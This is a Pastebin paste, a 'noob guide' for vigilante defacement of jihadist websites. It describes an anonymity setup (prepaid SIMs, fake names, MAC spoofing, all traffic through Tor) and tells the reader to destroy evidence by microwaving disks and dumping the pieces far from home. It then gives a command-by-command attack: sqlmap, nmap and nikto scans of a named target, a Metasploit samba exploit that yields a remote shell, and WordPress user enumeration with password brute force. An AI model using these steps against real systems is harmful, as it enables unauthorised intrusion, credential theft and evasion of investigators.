Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- `.:/+oyh:
- `:/oyhmNNNMMMMMM-
- yNNMMMMMMMMMMMMMy
- .MMMMMMMMMMMMMMMN.
- /MMMMMMMMMMMMMMMh
- +MMMMMMMMMMMMMMMo
- oMMMMMMMMMMMMMMMh .:+syhhhhhys/.
- sMMMMMMMMMMMMMMMM+. `:oyys+/--.....-/o+.
- sMMMMMMMMdsooosyhdhyo:` .+s/-` `..-------..``.`
- oMMMMMMMMhyyyyyysso++oso:` .. `-+ydmNNNNNmmmddho-
- oMMMMMMmsssyhdmNMMMMmho//+. `:ymNMMMmdyo/--....-/o+.
- +MMMMMM- .-/ydNMMMNd: `dMMMmds:. `-`
- /MMMMMM+ `-odMMMm `hhso+.`
- /MMMMMMm` `/dMN- `/o-
- -MMMMMMMh` ` `hMNo` +s` `:.
- .MMMMMMMMhssssssso+/-/ysoMMMd` . `:/oosssssso+--+hm-
- `MMMMdssyhmNNNNNNNNmh/hMMMMMMs odmNNNNNNNNdhsoymh-
- NMM+ `.....`:+:yMMMMMMd `.....` `+/`
- mMd .. sMMMMMMN .
- dMs `mMMMMMMM
- yM+ `yMMMMMMMN
- oM+ .dMMMMMMMMm
- /M+ `mMMMMMMMMMy
- -My yMMMMMMMMMM: ``
- `MN. `/dMMMMMMMMMMm `oy:`
- mMh//+///+oydy+-..:odMMMMMm. `-:. `/yyso+//+o+/`
- oMd` .dMMMMy. .+dMMMNo-.:+o+++: ``oNm+mh`
- `NMs -M/dMm/` `-mMMMNNMMm: `/dMy./N-
- +MMo hy`sMMmo- .+dMMMMhdMMMNh/` `-omMN+ .ms
- sMM+ .m+ :hMMNmyoosdNMMMMNo``sMMMMMmhsosymNMNy. .dd`
- `sMN+ :N+ `-oyddmmNNNNNms. :ydmNNNNmmddy+. .dd.
- +NMo :mo ```.:/+ossoooooo++oo++/-.``` :my`
- :mMy`-dy` `````....````` +mo`
- .hMd-`sd- .yh-
- `+NN+`/h/ `/sddhyddhs:` :h+`
- -hNy..so` `sMMNMMs` `+y.
- `+mm: /s. dMMMm .s/
- .yNs`.o- .NMMMN. -o.
- /md-`/: yMMMMMh :/`
- .sm+`-: mMMMMMN :-
- :dy..` dMMMMMm ``
- `+h: +MMMMMs
- .o- `NMMMM-
- sMMMy
- `NMN.
- :m:
- B1tsh1fter's Legionary Noob guide to Fucking ISIL online.
- https://www.youtube.com/watch?v=V1fMvLbE85E
- Vol 1 Website Defacement (Just in time for fuck ISIL friday.)
- ####################################################################################
- The term "website defacement" refers to any unauthorized changes made to the appearance of either a single webpage, or an entire site.
- Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work
- of system crackers, who break into a web server and replace the hosted website with one of their own.
- 1337 SETUP not for noobs
- ####################################################################################
- Mifi access point.
- https://www.verizonwireless.com/internet-devices/jetpack-mifi-6620l/ $49.99
- Prepaid sim cards
- http://www.ebay.com/sch/Verizon-SIM-Cards/29778/bn_591704/i.html
- https://www.youtube.com/watch?v=RyzKNMQB3OQ
- Fake Name generator
- https://fakena.me/fake-name/
- DAVIS STANDARD WIRELESS REPEATER SOLAR POWERED $200.00
- https://jet.com/product/detail/ca20e31f9fb34add9071c2b1d21c7575
- Turn do not broadcast ssid, just type it in at client.
- SETUP
- ####################################################################################
- Set random mac address first, before connecting to wifi.
- MAC Address Changer for windoze
- https://technitium.com/tmac/
- Download the the lastest version of the Kali linux .iso from a free wifi access point & burn on laptop/computer.
- https://www.kali.org/downloads/
- Boot from dvd drive;
- Install onto 16GB usb drive
- (warning do not use "USB persistence" this is diffrent, just install on to the USB drive using Kali graphic install.)
- On This drive;
- CORSAIR Padlock 2 16GB USB 2.0 Flash Drive AES Hardware-based encryption $29.99
- http://www.newegg.com/Product/Product.aspx?Item=N82E16820233128
- Also use LVM encryption in the Kali graphic install options.
- The OS is now dual, numberpad AES hardware encrypted & password AES LVM encrypted.
- When the drive is removed it leaves no trace on the computer.
- Destroy original Kali install disk with by cooking microwave for 3 min,
- shatter into pieces and dump in unmarked dumpster at least 5 blocks from residence (wear thick rubber gloves).
- Set BIOS too boot from the USB drive and away we go.
- IN CASE OF EMERGANCY!!
- Microwave USB drive for 5 min!! This will destroy the internal NAND chip and all data with it.
- Lockdown
- Kali boots with "root" user enabled by default, this is insecure we must change this.
- Enter into the following into the terminal;
- sudo adduser an0n
- Then enter password, leave info blank.
- Add user to the sudoers list;
- Enter into the following into the terminal;
- sudo usermod -a -G sudo an0n
- Disable root account,
- Enter into the following into the terminal;
- sudo passwd -l root
- reboot and login as An0n complete with password.
- sudo apt-get install logwatch
- sudo apt-get install rkhunter chkrootkit
- In /etc/chkrootkit.conf, change RUN_DAILY to "true" so that it runs regularly, and change "-q" to "" otherwise the output doesn’t make much sense. In /etc/default/rkhunter, change CRON_DAILY_RUN and CRON_DB_UPDATE to "true" so it runs regularly. REPORT_EMAIL="[email protected]"
- Add the following lines to /etc/sysctl.d/10-network-security.conf
- # Ignore ICMP broadcast requests
- net.ipv4.icmp_echo_ignore_broadcasts = 1
- # Disable source packet routing
- net.ipv4.conf.all.accept_source_route = 0
- net.ipv6.conf.all.accept_source_route = 0
- net.ipv4.conf.default.accept_source_route = 0
- net.ipv6.conf.default.accept_source_route = 0
- # Ignore send redirects
- net.ipv4.conf.all.send_redirects = 0
- net.ipv4.conf.default.send_redirects = 0
- # Block SYN attacks
- net.ipv4.tcp_max_syn_backlog = 2048
- net.ipv4.tcp_synack_retries = 2
- net.ipv4.tcp_syn_retries = 5
- # Log Martians
- net.ipv4.conf.all.log_martians = 1
- net.ipv4.icmp_ignore_bogus_error_responses = 1
- # Ignore ICMP redirects
- net.ipv4.conf.all.accept_redirects = 0
- net.ipv6.conf.all.accept_redirects = 0
- net.ipv4.conf.default.accept_redirects = 0
- net.ipv6.conf.default.accept_redirects = 0
- # Ignore Directed pings
- net.ipv4.icmp_echo_ignore_all = 1
- Chapter 1 Anonymity or "No shit sherlock":
- ####################################################################################
- For this chapter Login too a free wifi access point if possible.
- Install macchanger,
- Enter into the following into the terminal;
- sudo apt-get update && sudo apt-get install macchanger
- sudo apt-get install net-tools
- ifconfig
- sudo touch Desktop/MAC.sh && sudo chmod 777 MAC.sh
- sudo nano Desktop/MAC.sh
- !#/bin/bash
- sudo ifconfig enp2s0 down && sudo macchanger -r enp2s0 && sudo ifconfig enp2s0 up
- Fuck VPN's they lie, can get compromised and/or subpoena
- tunnel ALL through tor with the following config:
- Enter into the following into the terminal;
- sudo apt-get install tor && sudo apt-get install firehol &&
- sudo nano /etc/default/firehol
- modify the following in the file too START_FIREHOL=YES
- sudo apt-get install tor
- TOR config
- edit the following to
- sudo nano /etc/tor/torrc
- Very Important!!: Must run the following command on each boot without fail;
- sudo ifconfig eth0 down && sudo macchanger -r eth0 && sudo ifconfig eth0 up
- Fuck VPN's they lie, can get compromised and/or subpoena
- tunnel ALL through tor with the following config:
- Enter into the following into the terminal;
- sudo apt-get install tor && sudo apt-get install firehol &&
- sudo nano /etc/default/firehol
- modify the following in the file too START_FIREHOL=YES
- sudo apt-get install tor
- TOR config
- edit the following to
- sudo nano /etc/tor/torrc
- to this:
- ####start below here####
- VirtualAddrNetworkIPv4 10.192.0.0/10
- AutomapHostsOnResolve 1
- TransPort 9040
- DNSPort 53
- FascistFirewall 1
- FirewallPorts 443
- DataDirectory /var/lib/tor
- PidFile /var/run/tor/tor.pid
- User debian-tor
- ClientOnly
- strictnodes 1
- ExitNodes {us}
- ####end above here#####
- Firehol config
- sudo nano /etc/firehol/firehol.conf
- to this:
- ####start below here####
- version 5
- server_tor_ports="tcp/9050 tcp/9051"
- client_tor_ports="default"
- server_proxy_ports="tcp/9040"
- lient_tor_ports="default"
- server_proxy_ports="tcp/9040"
- client_proxy_ports="default"
- server_polipo_ports="tcp/8118"
- client_polipo_ports="default"
- server_dns_ports="udp/53"
- client_dns_ports="default"
- #all incoming DNS goes to port 53 or whatever your torrc's DNSPort is
- #for local redirection make sure your /etc/resolv.conf reads 'nameserver #127.0.0.1
- redirect to 53 inface eth+ proto udp src 192.168.0.0/16 dst not 127.0.0.1 dport 53
- #add to force all incoming tcp traffic to 9040
- #for some reason this will redirect locally generated tcp traffic too
- transparent_proxy "1:65535" 9040 debian-tor inface eth+ user not debian-tor dst not "$UNROUTABLE_IPS"
- interface eth0 dhcp
- policy return
- client dhcp accept
- client all accept
- #allow only outgoing TOR traffic
- interface eth0 internet src not "$UNROUTABLE_IPS"
- client all accept user debian-tor
- #add for local DNS and proxy access
- interface "eth0 lo" local src "192.168.1.2 127.0.0.1" dst "192.168.1.2 127.0.0.1"
- server dns accept
- server privoxy accept
- server tor accept
- server proxy accept
- #add for local TOR socks and control port access
- interface lo internal src 127.0.0.1 dst 127.0.0.1
- server tor accept
- server proxy accept
- ####end above here#####
- Remove icewesel and install firefox
- Enter the following into the terminal;
- apt-get remove iceweasel &&
- echo -e “ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main” | tee -a /etc/apt/sources.list > /dev/null &&
- apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 &&
- apt-get update &&
- apt-get install firefox-mozilla-build
- Firefox plugins to install;
- https://addons.mozilla.org/en-US/firefox/addon/cookie-whitelist-with-buttons/
- https://addons.mozilla.org/en-US/firefox/addon/sslpersonas/
- https://addons.mozilla.org/en-US/firefox/addon/ghostery/
- https://addons.mozilla.org/en-US/firefox/addon/smart-https/
- https://addons.mozilla.org/en-US/firefox/addon/noscript/
- https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
- https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/
- https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
- configure foxyproxy to use tor at 127.0.0.1 9050 socks 4a
- Install proxychains to stay stealth
- Enter the following into the terminal;
- sudo apt-get install proxychains
- Chapter 2 Target Acquired or "How 1337 am I?"
- ####################################################################################
- Enter the following into the terminal;
- sudo proxychains nslookup www.Jihadist.ps
- ####output start####
- Server: 8.8.8.8
- Address: 8.8.8.8#53
- Non-authoritative answer:
- www.Jihadist.ps canonical name = Jihadist.ps.
- Name: Jihadist.ps
- Address: 104.28.##.105
- Name: Jihadist.ps
- Address: 104.28.##.105
- ####output end####
- run sqlmap over tor with random user agent at target page for usernames and passwords;
- Enter the following into the terminal;
- sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
- run nmap in a separate terminal while we wait for the results
- Scan the ip with nmap + proxychains to route it over tor
- set to zero ping "-Pn" to avoid detection The
- -Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS;
- Enter the following into the terminal;
- sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
- Scan the site with nikto + proxychains to route it over tor;
- Enter the following into the terminal;
- sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
- Scan the site with uniscan + proxychains to route it over tor;
- Enter the following into the terminal;
- sudo proxychains ./uniscan -u https://www.Jihadist.ps/
- The following info should have been obtained with the help of the tor cloaked scanning
- Target ip (from nslookup) 104.28.##.105
- Target OS and Version from nmap.
- kick it oldschool by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
- We need to find out the OS and ports and services running on the target system.
- EXAMPLE;
- Once you find the open ports and service like a samba port its party time.
- Fire up Metasploit!
- Enter the following into the terminal;
- msfconsole
- Enter the follow into the Metasploit framework console;
- msf >set Proxies socks5:127.0.0.1:9050
- We need to find the version of samba..
- Enter each into the follow into the Metasploit framework console;
- msf > use auxiliary/scanner/smb/smb_version
- msf auxiliary(smb_version) >set RHOST 104.28.##.105
- RHOST => 104.28.##.105
- msfauxiliary(smb_version) >set RPORT 445
- RPORT => 445
- msfauxiliary(smb_version) >exploit
- With version in hand, restart msfconsole now we use the appropriate module...
- msfconsole
- msf >set Proxies socks5:127.0.0.1:9050
- msf >use exploit/multi/samba/usermap_script
- msf exploit(usermap_script) > set RHOST 104.28.##.105
- msf exploit(usermap_script) >exploit
- We now have a command shell on the target box!
- Chapter 3 Other methods of infiltration or "Boba fett is dead!"
- ####################################################################################
- If using Wordpress; (Credit to Dr Chaos);
- wpscan –-url wordpress_url
- You should be able to quickly determine the WordPress version, which plugins are installed, and what theme is active when you open the scanner.
- The first thing we will do is look for lines beginning with a red plus (+). These are the known WordPress vulnerabilities.
- If the correct vulnerability exists, you can enumerate a user list from WordPress with the following command:
- wpscan –-url wordpress_url –-enumerate u
- Once user names have been collected, you then can attempt to brute force crack the associated passwords.
- You can also download our custom word list from here: /usr/share/wordlists
- WARNING: DO A SAVE AS OR YOUR BROWSER MAY CRASH
- wget http://www.drchaos.com/public_files/chaos-dictionary.lst.txt
- Brute force the following command:
- wpscan –-url [wordpress_url] –-word list [path_to_world list] –-username [username to bruteforce] –threads [number of threads]
- The result? If you are lucky, you can see WPScan was able to crack the password.
- To be continued...
- What does the Fawkes say?
Advertisement
Add Comment
Please, Sign In to add comment
